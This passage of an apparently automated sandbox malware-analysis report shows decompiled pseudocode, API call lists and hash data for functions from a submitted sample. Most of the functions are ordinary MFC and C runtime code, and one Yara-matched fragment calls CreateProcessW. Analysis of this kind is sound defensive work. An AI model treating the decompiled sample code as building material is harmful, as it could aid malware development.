                  0x00404d31
                  0x00404d37
                  0x00404d39
                  0x00404d39
                  0x00404d3e
                  0x00404d49
                  0x00404d4a
                  0x00404d4b
                  0x00404d50
                  0x00404d53
                  0x00404d54
                  0x00404d55
                  0x00404d56
                  0x00404d57
                  0x00404d58
                  0x00404d59
                  0x00404d5e
                  0x00404d63
                  0x00404d6e
                  0x00404d76
                  0x00404d7d
                  0x00404d85
                  0x00000000
                  0x00404d78
                  0x00000000
                  0x00404d78

                  APIs
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.646252420.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.646248492.0000000000400000.00000002.00020000.sdmp Download File
                  • Associated: 00000000.00000002.646287294.000000000044E000.00000002.00020000.sdmp Download File
                  • Associated: 00000000.00000002.646297277.0000000000462000.00000004.00020000.sdmp Download File
                  • Associated: 00000000.00000002.646302440.0000000000469000.00000002.00020000.sdmp Download File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_YF4dF4w2Cr.jbxd
                  Similarity
                  • API ID: BringWindow
                  • String ID: mdiclient
                  • API String ID: 1361440306-1999401180
                  • Opcode ID: 0afc53f6849adb919cecdf31f6e9fdba312867e3a853da981439882dcb4a5666
                  • Instruction ID: 6620486015e60b6a059689b7e1a8a8747eecd99153f1f0efe6d475f075f97d44
                  • Opcode Fuzzy Hash: 0afc53f6849adb919cecdf31f6e9fdba312867e3a853da981439882dcb4a5666
                  • Instruction Fuzzy Hash: 8D11A0B1A102047BD7248BA6CC89E6BBAECEFD9714F10442AB505D72A1E5B498008624
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 00407991, Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 53COMMON
                  Download Yara Rule
                  C-Code - Quality: 100%
                  			E00407991(void* __ebx, void* __ecx, intOrPtr _a4, signed int _a8, signed int _a12, char _a16, intOrPtr _a32) {
				struct tagRECT _v20;
				void* __edi;
				void* __esi;
				signed int _t17;
				void* _t24;
				signed int _t28;
				void* _t29;
				signed int* _t31;
				void* _t34;
				signed int _t40;

				_t29 = __ebx;
				_t34 = __ecx;
				E00406AAE( &_a16);
				_t35 = _a12;
				_t17 = _a12 & 0x0040ffff;
				_t31 = __ecx + 0x84;
				 *_t31 = _t17;
				if(_a32 == 0xe800) {
					_t28 = _t17 | 0x00000008;
					_t40 = _t28;
					 *_t31 = _t28;
				}
				E00411F96(_t29, _t31, _t34, _t35, _t40, 0x1000); // executed
				E0040791D(_t31, _t34); // executed
				E004064F0(_t31); // executed
				SetRectEmpty( &_v20);
				_t24 = E0040D84A(_t34, "ToolbarWindow32", 0, _t35 & 0xffbf004e | _a8 | 0x0000004e,  &_v20, _a4, _a32, 0); // executed
				if(_t24 != 0) {
					E00406DB6(_t34,  *((intOrPtr*)(_t34 + 0xb0)),  *((intOrPtr*)(_t34 + 0xb4)),  *((intOrPtr*)(_t34 + 0xa8)),  *((intOrPtr*)(_t34 + 0xac)));
					return 1;
				}
				return _t24;
			}













                  0x00407991
                  0x0040799f
                  0x004079a1
                  0x004079a6
                  0x004079ab
                  0x004079b7
                  0x004079bd
                  0x004079bf
                  0x004079c1
                  0x004079c1
                  0x004079c4
                  0x004079c4
                  0x004079cb
                  0x004079d0
                  0x004079d5
                  0x004079de
                  0x00407a06
                  0x00407a0d
                  0x00407a29
                  0x00000000
                  0x00407a30
                  0x00407a34

                  APIs
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.646252420.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.646248492.0000000000400000.00000002.00020000.sdmp Download File
                  • Associated: 00000000.00000002.646287294.000000000044E000.00000002.00020000.sdmp Download File
                  • Associated: 00000000.00000002.646297277.0000000000462000.00000004.00020000.sdmp Download File
                  • Associated: 00000000.00000002.646302440.0000000000469000.00000002.00020000.sdmp Download File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_YF4dF4w2Cr.jbxd
                  Similarity
                  • API ID: EmptyRect
                  • String ID: ToolbarWindow32
                  • API String ID: 2270935405-4104838417
                  • Opcode ID: fb5b6df229c39a1bc564c3f4343866c0a1e9980edddc86798078d9dc56cba60c
                  • Instruction ID: 505957d6a176a6e826c3b6042989fcaafd5f8927dda6a395bbae33c2c064a4d4
                  • Opcode Fuzzy Hash: fb5b6df229c39a1bc564c3f4343866c0a1e9980edddc86798078d9dc56cba60c
                  • Instruction Fuzzy Hash: 9C11A572710209BBDF11AFA1CC01BDA7B69FF85358F014436F915B61D1DB38A825CBA9
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 02311CC1, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 44processCOMMON
                  Download Yara Rule
                  APIs
                  • CreateProcessW.KERNELBASE(?,?,00000000,00000000,00000000,00000000,00000000,00000000,00000044,?), ref: 02311CF2
                  • CloseHandle.KERNEL32(?,?,?,00000000,00000000,00000000,00000000,00000000,00000000,00000044,?), ref: 02311D12
                  • CloseHandle.KERNEL32(?,?,?,00000000,00000000,00000000,00000000,00000000,00000000,00000044,?), ref: 02311D1B
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.646512151.0000000002311000.00000020.00000001.sdmp, Offset: 02311000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_2311000_YF4dF4w2Cr.jbxd
                  Yara matches
                  Similarity
                  • API ID: CloseHandle$CreateProcess
                  • String ID: D
                  • API String ID: 2922976086-2746444292
                  • Opcode ID: 3229fe4f920ac49b95222aba6fca871d4d34b36665dc72c1105e7d626ea6d01a
                  • Instruction ID: 92723614778f17a721474af575f57b2bcf76421b23926c35c065e005fd340a84
                  • Opcode Fuzzy Hash: 3229fe4f920ac49b95222aba6fca871d4d34b36665dc72c1105e7d626ea6d01a
                  • Instruction Fuzzy Hash: B4F0E9729000086BDB24CEA58C049FFB7BDEF86311F10402AEE1FEB100EB749909C5A0
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 0040B954, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 40COMMON
                  Download Yara Rule
                  C-Code - Quality: 100%
                  			E0040B954(void* __ebx, void* __ecx, intOrPtr _a4, signed int _a8, signed int _a12, intOrPtr _a16) {
				struct tagRECT _v20;
				void* __edi;
				void* __esi;
				signed int _t11;
				void* _t21;
				void* _t22;
				signed int _t29;
				void* _t32;
				signed int _t37;

				_t22 = __ebx;
				_t11 = _a12;
				_t32 = __ecx;
				 *(__ecx + 0x84) = _t11 & 0x0040ffff;
				_t26 = _a4;
				_t29 = _t11 & 0xffbf004e | 0x0000004e;
				if((E00412B38(_a4) & 0x00040000) != 0) {
					_t37 = _t29;
				}
				E00411F96(_t22, _t26, _t29, _t32, _t37, 0x1000);
				SetRectEmpty( &_v20);
				_t21 = E0040D84A(_t32, "msctls_statusbar32", 0, _a8 | _t29,  &_v20, _a4, _a16, 0); // executed
				return _t21;
			}












                  0x0040b954
                  0x0040b959
                  0x0040b960
                  0x0040b96f
                  0x0040b975
                  0x0040b97c
                  0x0040b988
                  0x0040b98a
                  0x0040b98a
                  0x0040b995
                  0x0040b99e
                  0x0040b9bf
                  0x0040b9c7

                  APIs
                    • Part of subcall function 00412B38: GetWindowLongA.USER32 ref: 00412B43
                  • SetRectEmpty.USER32(?), ref: 0040B99E
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.646252420.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.646248492.0000000000400000.00000002.00020000.sdmp Download File
                  • Associated: 00000000.00000002.646287294.000000000044E000.00000002.00020000.sdmp Download File
                  • Associated: 00000000.00000002.646297277.0000000000462000.00000004.00020000.sdmp Download File
                  • Associated: 00000000.00000002.646302440.0000000000469000.00000002.00020000.sdmp Download File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_YF4dF4w2Cr.jbxd
                  Similarity
                  • API ID: EmptyLongRectWindow
                  • String ID: msctls_statusbar32
                  • API String ID: 2293799620-4095915827
                  • Opcode ID: 85e7e89a38f6645222136ab41357720aa548ffbfdea95d73971b2ef4f0f8a088
                  • Instruction ID: 468b7fd0b6eacb9e28decebd9ac57333f4eba2f844c003510548747924e0c593
                  • Opcode Fuzzy Hash: 85e7e89a38f6645222136ab41357720aa548ffbfdea95d73971b2ef4f0f8a088
                  • Instruction Fuzzy Hash: 36F0C87270024967DB10EFA9DC06FEB3799EB84754F04443AFA19E71C1CAB8E8548658
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 0041346C, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 30COMMON
                  Download Yara Rule
                  C-Code - Quality: 100%
                  			E0041346C(void* __ebx, void* __ecx, void* __edi, intOrPtr _a4, signed int _a8, intOrPtr _a12) {
				struct tagRECT _v20;
				void* __esi;
				void* __ebp;
				void* _t15;
				void* _t21;

				_t20 = __edi;
				_t18 = __ecx;
				_t17 = __ebx;
				_t22 = _a4;
				_t21 = __ecx;
				if(_a4 == 0) {
					E00406436(__ebx, __ecx, __edi, __ecx, _t22);
				}
				_t10 = _a8 & 0x0040ffff;
				 *(_t21 + 0x84) = _a8 & 0x0040ffff;
				E00411F96(_t17, _t18, _t20, _t21, _t10, 2);
				SetRectEmpty( &_v20);
				_t15 = E0040D84A(_t21, "AfxControlBar90s", 0, _a8,  &_v20, _a4, _a12, 0); // executed
				return _t15;
			}








                  0x0041346c
                  0x0041346c
                  0x0041346c
                  0x00413474
                  0x00413479
                  0x0041347b
                  0x0041347d
                  0x0041347d
                  0x00413485
                  0x0041348c
                  0x00413492
                  0x0041349b
                  0x004134b9
                  0x004134c0

                  APIs
                  • SetRectEmpty.USER32(?), ref: 0041349B
                    • Part of subcall function 00406436: __CxxThrowException@8.LIBCMT ref: 0040644C
                    • Part of subcall function 00406436: __EH_prolog3.LIBCMT ref: 00406459
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.646252420.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.646248492.0000000000400000.00000002.00020000.sdmp Download File
                  • Associated: 00000000.00000002.646287294.000000000044E000.00000002.00020000.sdmp Download File
                  • Associated: 00000000.00000002.646297277.0000000000462000.00000004.00020000.sdmp Download File
                  • Associated: 00000000.00000002.646302440.0000000000469000.00000002.00020000.sdmp Download File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_YF4dF4w2Cr.jbxd
                  Similarity
                  • API ID: EmptyException@8H_prolog3RectThrow
                  • String ID: AfxControlBar90s
                  • API String ID: 1106273639-4082281646
                  • Opcode ID: 0fe03d747cc36f8c21c24473658bc4f8ca051e35eeafd5a74ad71c3be61d63ab
                  • Instruction ID: 904d40750636b72848055661a794ad6f36defb35cdb82f78ac122cc83c2a69a9
                  • Opcode Fuzzy Hash: 0fe03d747cc36f8c21c24473658bc4f8ca051e35eeafd5a74ad71c3be61d63ab
                  • Instruction Fuzzy Hash: 49F0823250021ABBDF20AFA5CC06FDE3B69FB40314F10842BF914AA1C1DA7895548758
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 00404461, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 23COMMONLIBRARYCODE
                  Download Yara Rule
                  C-Code - Quality: 27%
                  			E00404461(void* __eflags, intOrPtr _a4) {
				void* _t3;
				intOrPtr* _t4;
				void* _t7;
				void* _t10;
				void* _t11;
				void* _t12;

				while(1) {
					_t3 = E0043108C(_t7, _t10, _t11, _a4); // executed
					_t12 = _t3;
					if(_t12 != 0) {
						break;
					}
					_t4 =  *0x462298; // 0x404445
					if(_t4 != 0) {
						_push(_a4);
						if( *_t4() != 0) {
							continue;
						}
					}
					break;
				}
				return _t12;
			}









                  0x0040447c
                  0x0040447f
                  0x00404484
                  0x00404489
                  0x00000000
                  0x00000000
                  0x00404469
                  0x00404470
                  0x00404472
                  0x0040447a
                  0x00000000
                  0x00000000
                  0x0040447a
                  0x00000000
                  0x00404470
                  0x0040448f

                  APIs
                  • _malloc.LIBCMT ref: 0040447F
                    • Part of subcall function 0043108C: __FF_MSGBANNER.LIBCMT ref: 004310AF
                    • Part of subcall function 0043108C: __NMSG_WRITE.LIBCMT ref: 004310B6
                    • Part of subcall function 0043108C: RtlAllocateHeap.NTDLL(00000000,-0000000E,00000001,00000000,00000000,?,004381A2,00000001,00000001,00000001,?,0043A049,00000018,0045E2A8,0000000C,0043A0DA), ref: 00431103
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.646252420.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.646248492.0000000000400000.00000002.00020000.sdmp Download File
                  • Associated: 00000000.00000002.646287294.000000000044E000.00000002.00020000.sdmp Download File
                  • Associated: 00000000.00000002.646297277.0000000000462000.00000004.00020000.sdmp Download File
                  • Associated: 00000000.00000002.646302440.0000000000469000.00000002.00020000.sdmp Download File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_YF4dF4w2Cr.jbxd
                  Similarity
                  • API ID: AllocateHeap_malloc
                  • String ID: ED@
                  • API String ID: 501242067-1809407400
                  • Opcode ID: 6e25af06defa9b9827857281b9dce4e04c166c3dc53613bcea4009c0ca779b1c
                  • Instruction ID: 390a9ce1f592537ae75951aa16ff758075523778642dbaca2e903489ec7b59e7
                  • Opcode Fuzzy Hash: 6e25af06defa9b9827857281b9dce4e04c166c3dc53613bcea4009c0ca779b1c
                  • Instruction Fuzzy Hash: D0D0C2722041256B8A1055AAEC10A5A7758CBC07F07080137FE08E62A0DA75DC0142C9
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 00416609, Relevance: 3.1, APIs: 2, Instructions: 116windowCOMMON
                  Download Yara Rule
                  C-Code - Quality: 89%
                  			E00416609(void* __ebx, intOrPtr* __ecx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				intOrPtr _t36;
				void* _t37;
				intOrPtr _t39;
				intOrPtr _t46;
				intOrPtr _t47;
				intOrPtr _t53;
				void* _t55;
				intOrPtr _t69;
				void* _t72;
				intOrPtr _t76;
				void* _t80;
				void* _t83;

				_t72 = __edx;
				_push(4);
				E00431A9B(E0044B3E2, __ebx, __edi, __esi);
				_t79 = __ecx;
				_t76 =  *((intOrPtr*)(_t80 + 8));
				_t36 =  *((intOrPtr*)(_t76 + 0x14));
				 *((intOrPtr*)(_t80 - 0x10)) = 1;
				if(_t36 == 0) {
					_t37 = E0041F363(0, _t76, __ecx, __eflags);
					_t39 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t37 + 4)))) + 0xc))(0xe100, 0, 0, 0);
					__eflags = _t39;
					if(_t39 == 0) {
						E00417F31(_t79);
					}
					__eflags =  *((intOrPtr*)(_t79 + 0x20));
					L29:
					if(__eflags != 0) {
						L31:
						return E00431B73( *((intOrPtr*)(_t80 - 0x10)));
					}
					L30:
					 *((intOrPtr*)(_t80 - 0x10)) = 0;
					goto L31;
				}
				_t83 = _t36 - 1;
				if(_t83 == 0) {
					_push( *((intOrPtr*)(_t76 + 0x18)));
					__eflags =  *((intOrPtr*)( *__ecx + 0x88))();
					goto L29;
				}
				if(_t83 <= 0) {
					goto L31;
				}
				if(_t36 <= 3) {
					 *((intOrPtr*)(__ecx + 0x4c)) = 0;
					_push( *((intOrPtr*)(_t76 + 0x18)));
					_t46 =  *((intOrPtr*)( *__ecx + 0x88))();
					__eflags = _t46;
					if(_t46 != 0) {
						_t47 =  *((intOrPtr*)(__ecx + 0x20));
						 *((intOrPtr*)(__ecx + 0x8c)) = _t76;
						__eflags = _t47;
						if(__eflags == 0) {
							_t47 = E00406436(0, __ecx, _t76, __ecx, __eflags);
						}
						SendMessageA( *(_t47 + 0x20), 0x111, 0xe108, 0);
						 *((intOrPtr*)(_t79 + 0x8c)) = 0;
					}
					goto L30;
				}
				if(_t36 == 4) {
					 *((intOrPtr*)(__ecx + 0x8c)) =  *((intOrPtr*)(__ecx + 0x4c));
					 *((intOrPtr*)(__ecx + 0x4c)) = 0;
					goto L31;
				}
				if(_t36 == 5) {
					 *((intOrPtr*)( *__ecx + 0x80))();
					 *((intOrPtr*)(_t80 - 0x10)) = 0;
					__eflags =  *((intOrPtr*)(__ecx + 0x8c));
					if(__eflags != 0) {
						goto L31;
					}
					_t69 = E00404461(__eflags, 0x28);
					 *((intOrPtr*)(_t80 + 8)) = _t69;
					 *((intOrPtr*)(_t80 - 4)) = 0;
					L16:
					_t91 = _t69;
					if(_t69 == 0) {
						_t53 = 0;
						__eflags = 0;
					} else {
						_t53 = E0041576C(_t69, _t91);
					}
					 *((intOrPtr*)(_t79 + 0x8c)) = _t53;
					 *((intOrPtr*)(_t53 + 0x14)) = 6;
					goto L31;
				}
				if(_t36 != 6) {
					goto L31;
				}
				_t55 =  *((intOrPtr*)( *__ecx + 0x84))();
				if( *((intOrPtr*)(_t76 + 8)) == 0) {
					_push(0xffffffff);
					_push(0);
					_t89 = _t55;
					if(_t55 == 0) {
						_push(0xf10c);
					} else {
						_push(0xf10b);
					}
					E00417146(0, _t72, _t76, _t79, _t89);
				}
				 *((intOrPtr*)(_t80 - 0x10)) = 0;
				_t90 =  *((intOrPtr*)(_t79 + 0x8c));
				if( *((intOrPtr*)(_t79 + 0x8c)) != 0) {
					goto L31;
				} else {
					_t69 = E00404461(_t90, 0x28);
					 *((intOrPtr*)(_t80 + 8)) = _t69;
					 *((intOrPtr*)(_t80 - 4)) = 1;
					goto L16;
				}
			}















                  0x00416609
                  0x00416609
                  0x00416610
                  0x00416615
                  0x00416617
                  0x0041661a
                  0x00416622
                  0x00416627
                  0x00416752
                  0x00416766
                  0x00416769
                  0x0041676b
                  0x0041676f
                  0x0041676f
                  0x00416774
                  0x00416777
                  0x00416777
                  0x0041677c
                  0x00416784
                  0x00416784
                  0x00416779
                  0x00416779
                  0x00000000
                  0x00416779
                  0x0041662d
                  0x0041662f
                  0x00416745
                  0x0041674e
                  0x00000000
                  0x0041674e
                  0x00416635
                  0x00000000
                  0x00000000
                  0x0041663e
                  0x004166ff
                  0x00416705
                  0x00416708
                  0x0041670e
                  0x00416710
                  0x00416712
                  0x00416715
                  0x0041671b
                  0x0041671d
                  0x0041671f
                  0x0041671f
                  0x00416732
                  0x00416738
                  0x00416738
                  0x00000000
                  0x00416710
                  0x00416647
                  0x004166f2
                  0x004166f8
                  0x00000000
                  0x004166f8
                  0x00416650
                  0x004166ab
                  0x004166b1
                  0x004166b4
                  0x004166ba
                  0x00000000
                  0x00000000
                  0x004166c8
                  0x004166ca
                  0x004166cd
                  0x004166d0
                  0x004166d0
                  0x004166d2
                  0x004166db
                  0x004166db
                  0x004166d4
                  0x004166d4
                  0x004166d4
                  0x004166dd
                  0x004166e3
                  0x00000000
                  0x004166e3
                  0x00416655
                  0x00000000
                  0x00000000
                  0x0041665f
                  0x00416668
                  0x0041666a
                  0x0041666c
                  0x0041666d
                  0x0041666f
                  0x00416678
                  0x00416671
                  0x00416671
                  0x00416671
                  0x0041667d
                  0x0041667d
                  0x00416682
                  0x00416685
                  0x0041668b
                  0x00000000
                  0x00416691
                  0x00416699
                  0x0041669b
                  0x0041669e
                  0x00000000
                  0x0041669e

                  APIs
                  • __EH_prolog3.LIBCMT ref: 00416610
                  • SendMessageA.USER32(?,00000111,0000E108,00000000), ref: 00416732
                  Memory Dump Source
                  • Source File: 00000000.00000002.646252420.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.646248492.0000000000400000.00000002.00020000.sdmp Download File
                  • Associated: 00000000.00000002.646287294.000000000044E000.00000002.00020000.sdmp Download File
                  • Associated: 00000000.00000002.646297277.0000000000462000.00000004.00020000.sdmp Download File
                  • Associated: 00000000.00000002.646302440.0000000000469000.00000002.00020000.sdmp Download File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_YF4dF4w2Cr.jbxd
                  Similarity
                  • API ID: H_prolog3MessageSend
                  • String ID:
                  • API String ID: 936991600-0
                  • Opcode ID: e4de2e1b29feed0a13db066fa8e5efa98775103b20291ef35618312c6e1f6ce6
                  • Instruction ID: 70473528937c0bf9d11c87dc8b8dc0f91426da9b43ce8fb73777ee02d115459c
                  • Opcode Fuzzy Hash: e4de2e1b29feed0a13db066fa8e5efa98775103b20291ef35618312c6e1f6ce6
                  • Instruction Fuzzy Hash: 4F414F74600611DFDB249F69C888AAAB7F0BB58308F11893FE156D7391DB78D8C18F59
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 004185A1, Relevance: 3.1, APIs: 2, Instructions: 109COMMON
                  Download Yara Rule
                  C-Code - Quality: 90%
                  			E004185A1(void* __ebx, intOrPtr* __ecx, void* __edx, void* __eflags, signed int _a12, intOrPtr* _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28) {
				struct tagRECT _v20;
				signed int _v24;
				signed int _v36;
				char _v68;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed int _t37;
				signed int _t38;
				signed int _t49;
				void* _t56;
				void* _t78;
				void* _t81;
				intOrPtr* _t85;

				_t90 = __eflags;
				_t78 = __edx;
				_t56 = __ebx;
				_push(_t81);
				_t85 = __ecx;
				 *((intOrPtr*)(__ecx + 0x8c)) = _a28;
				E00411F96(__ebx, __ecx, _t81, __ecx, __eflags, 0x10);
				E00411F96(__ebx, __ecx, _t81, __ecx, _t90, 0x3c000);
				E00431160(0,  &_v68, 0, 0x30);
				if(_a12 == 0) {
					_a12 = 0x50800000;
				}
				_v36 = _a12;
				_push( &_v68);
				if( *((intOrPtr*)( *_t85 + 0x64))() != 0) {
					_t37 = E00417E26(_t85, _t78, __eflags,  *((intOrPtr*)(_t85 + 0x88)), _a20); // executed
					__eflags = _t37;
					if(_t37 == 0) {
						goto L3;
					} else {
						 *((intOrPtr*)(_t85 + 0x8c)) = 0;
						E00412B6C(_t85, 0xc00000, _v36 & 0x00c00000, 0);
						E00412B98(_t85, 0x200, _v24 & 0x00000200, 0);
						E00412C0B(_t85, _a24);
						GetWindowRect( *(_t85 + 0x20),  &_v20);
						E00419E93(_t56, _t85, 0, _t85, __eflags, 1, _v20.right - _v20.left, _v20.bottom - _v20.top, 0x4527fc, 0x4527fc);
						_t49 = E004122AD(_t85,  *((intOrPtr*)(_t85 + 0x88)));
						__eflags = _t49;
						if(_t49 == 0) {
							goto L3;
						} else {
							_t50 = _a16;
							_push(_t56);
							E00412D05(_t85, 0,  *_a16,  *((intOrPtr*)(_t50 + 4)),  *((intOrPtr*)(_t50 + 8)) -  *_a16,  *((intOrPtr*)(_t50 + 0xc)) -  *((intOrPtr*)(_t50 + 4)), 0x14); // executed
							__eflags = _a12 & 0x10000000;
							if((_a12 & 0x10000000) != 0) {
								E00412C34(_t85, 1); // executed
							}
							_t38 = 1;
							__eflags = 1;
						}
					}
				} else {
					L3:
					_t38 = 0;
				}
				return _t38;
			}

















                  0x004185a1
                  0x004185a1
                  0x004185a1
                  0x004185ad
                  0x004185ae
                  0x004185b2
                  0x004185b8
                  0x004185c2
                  0x004185d0
                  0x004185db
                  0x004185dd
                  0x004185dd
                  0x004185ea
                  0x004185ef
                  0x004185f7
                  0x0041860b
                  0x00418610
                  0x00418612
                  0x00000000
                  0x00418614
                  0x00418623
                  0x00418629
                  0x0041863d
                  0x00418647
                  0x00418653
                  0x00418672
                  0x0041867f
                  0x00418684
                  0x00418686
                  0x00000000
                  0x0041868c
                  0x0041868c
                  0x00418694
                  0x004186a8
                  0x004186ad
                  0x004186b5
                  0x004186bb
                  0x004186bb
                  0x004186c2
                  0x004186c2
                  0x004186c2
                  0x00418686
                  0x004185f9
                  0x004185f9
                  0x004185f9
                  0x004185f9
                  0x004186c6

                  APIs
                    • Part of subcall function 00411F96: _memset.LIBCMT ref: 00411FC6
                  • _memset.LIBCMT ref: 004185D0
                    • Part of subcall function 00417E26: FindResourceA.KERNEL32(?,?,00000005), ref: 00417E42
                    • Part of subcall function 00417E26: LoadResource.KERNEL32(?,00000000), ref: 00417E4A
                    • Part of subcall function 00417E26: LockResource.KERNEL32(00000000), ref: 00417E57
                    • Part of subcall function 00417E26: FreeResource.KERNEL32(00000000,00000000,?,?), ref: 00417E6F
                  • GetWindowRect.USER32 ref: 00418653
                  Memory Dump Source
                  • Source File: 00000000.00000002.646252420.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.646248492.0000000000400000.00000002.00020000.sdmp Download File
                  • Associated: 00000000.00000002.646287294.000000000044E000.00000002.00020000.sdmp Download File
                  • Associated: 00000000.00000002.646297277.0000000000462000.00000004.00020000.sdmp Download File
                  • Associated: 00000000.00000002.646302440.0000000000469000.00000002.00020000.sdmp Download File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_YF4dF4w2Cr.jbxd
                  Similarity
                  • API ID: Resource$_memset$FindFreeLoadLockRectWindow
                  • String ID:
                  • API String ID: 2572468386-0
                  • Opcode ID: 2c2feab1a74483de2365b3fae192b7c3f521a05bb95ecf08c35458e0af3a68d2
                  • Instruction ID: cc6bf4f3222145c678c235a5d4e7989ebcd45410e0d0120669b6de292d8644ed
                  • Opcode Fuzzy Hash: 2c2feab1a74483de2365b3fae192b7c3f521a05bb95ecf08c35458e0af3a68d2
                  • Instruction Fuzzy Hash: EE313971600209AFEB14EF69CD55FBF77A9EB88704F00411EF906D3291DBB8AD518A68
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 0040ACDF, Relevance: 3.1, APIs: 2, Instructions: 80windowCOMMON
                  Download Yara Rule
                  C-Code - Quality: 75%
                  			E0040ACDF(void* __ebx, intOrPtr* __ecx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				void* _t29;
				void* _t31;
				struct HMENU__* _t36;
				signed short _t63;
				intOrPtr* _t66;
				void* _t67;
				void* _t68;

				_t61 = __edx;
				_t46 = __ebx;
				_push(4);
				E00431A9B(E0044AE45, __ebx, __edi, __esi);
				_t66 = __ecx;
				_t63 =  *(_t68 + 8);
				 *(__ecx + 0xa4) = _t63;
				E004014C0(_t68 + 8, __edx);
				 *(_t68 - 4) =  *(_t68 - 4) & 0x00000000;
				_t52 = _t68 + 8;
				_t29 = E00402720(_t68 + 8, _t63);
				_t70 = _t29;
				if(_t29 != 0) {
					E0041B29E(_t66 + 0xc4,  *(_t68 + 8), 0, 0xa);
				}
				E00411F96(_t46, _t52, _t63, _t66, _t70, 8);
				_t31 = E00408C1D(_t46, _t66, _t70,  *((intOrPtr*)(_t68 + 0xc)), _t63);
				E00405562(_t68 - 0x10, _t70, _t66 + 0xc4);
				_push( *((intOrPtr*)(_t68 + 0x14)));
				_push(0);
				_t64 = _t63 & 0x0000ffff;
				_push(_t63 & 0x0000ffff);
				_push( *((intOrPtr*)(_t68 + 0x10)));
				_push(0x46279c);
				_push( *((intOrPtr*)(_t68 + 0xc)));
				 *(_t68 - 4) = 1;
				_push( *((intOrPtr*)(_t68 - 0x10)));
				_push(_t31); // executed
				if( *((intOrPtr*)( *_t66 + 0x13c))() != 0) {
					__eflags =  *((intOrPtr*)(_t66 + 0xd4)) - 1;
					if(__eflags != 0) {
						_t36 =  *(_t66 + 0xd8);
					} else {
						_t36 = GetMenu( *(_t66 + 0x20));
					}
					_t56 = _t66;
					 *(_t66 + 0x5c) = _t36;
					E00408862(_t66, __eflags, _t64);
					__eflags =  *((intOrPtr*)(_t68 + 0x14));
					if( *((intOrPtr*)(_t68 + 0x14)) == 0) {
						E0040F918(1, _t56,  *(_t66 + 0x20), 0x364, 0, 0, 1, 1); // executed
					}
					_t67 = 1;
					goto L4;
				} else {
					_t67 = 0;
					L4:
					E004010B0( *((intOrPtr*)(_t68 - 0x10)) + 0xfffffff0, _t61);
					E004010B0( *(_t68 + 8) + 0xfffffff0, _t61);
					return E00431B73(_t67);
				}
			}










                  0x0040acdf
                  0x0040acdf
                  0x0040acdf
                  0x0040ace6
                  0x0040aceb
                  0x0040aced
                  0x0040acf3
                  0x0040acf9
                  0x0040acfe
                  0x0040ad03
                  0x0040ad06
                  0x0040ad0b
                  0x0040ad0d
                  0x0040ad1d
                  0x0040ad1d
                  0x0040ad24
                  0x0040ad2f
                  0x0040ad40
                  0x0040ad45
                  0x0040ad4a
                  0x0040ad4c
                  0x0040ad4f
                  0x0040ad50
                  0x0040ad55
                  0x0040ad5a
                  0x0040ad5d
                  0x0040ad61
                  0x0040ad64
                  0x0040ad6d
                  0x0040ad94
                  0x0040ad9a
                  0x0040ada7
                  0x0040ad9c
                  0x0040ad9f
                  0x0040ad9f
                  0x0040adae
                  0x0040adb0
                  0x0040adb3
                  0x0040adba
                  0x0040adbd
                  0x0040adcb
                  0x0040adcb
                  0x0040add0
                  0x00000000
                  0x0040ad6f
                  0x0040ad6f
                  0x0040ad71
                  0x0040ad77
                  0x0040ad82
                  0x0040ad8e
                  0x0040ad8e

                  APIs
                  Memory Dump Source
                  • Source File: 00000000.00000002.646252420.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.646248492.0000000000400000.00000002.00020000.sdmp Download File
                  • Associated: 00000000.00000002.646287294.000000000044E000.00000002.00020000.sdmp Download File
                  • Associated: 00000000.00000002.646297277.0000000000462000.00000004.00020000.sdmp Download File
                  • Associated: 00000000.00000002.646302440.0000000000469000.00000002.00020000.sdmp Download File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_YF4dF4w2Cr.jbxd
                  Similarity
                  • API ID: H_prolog3Menu
                  • String ID:
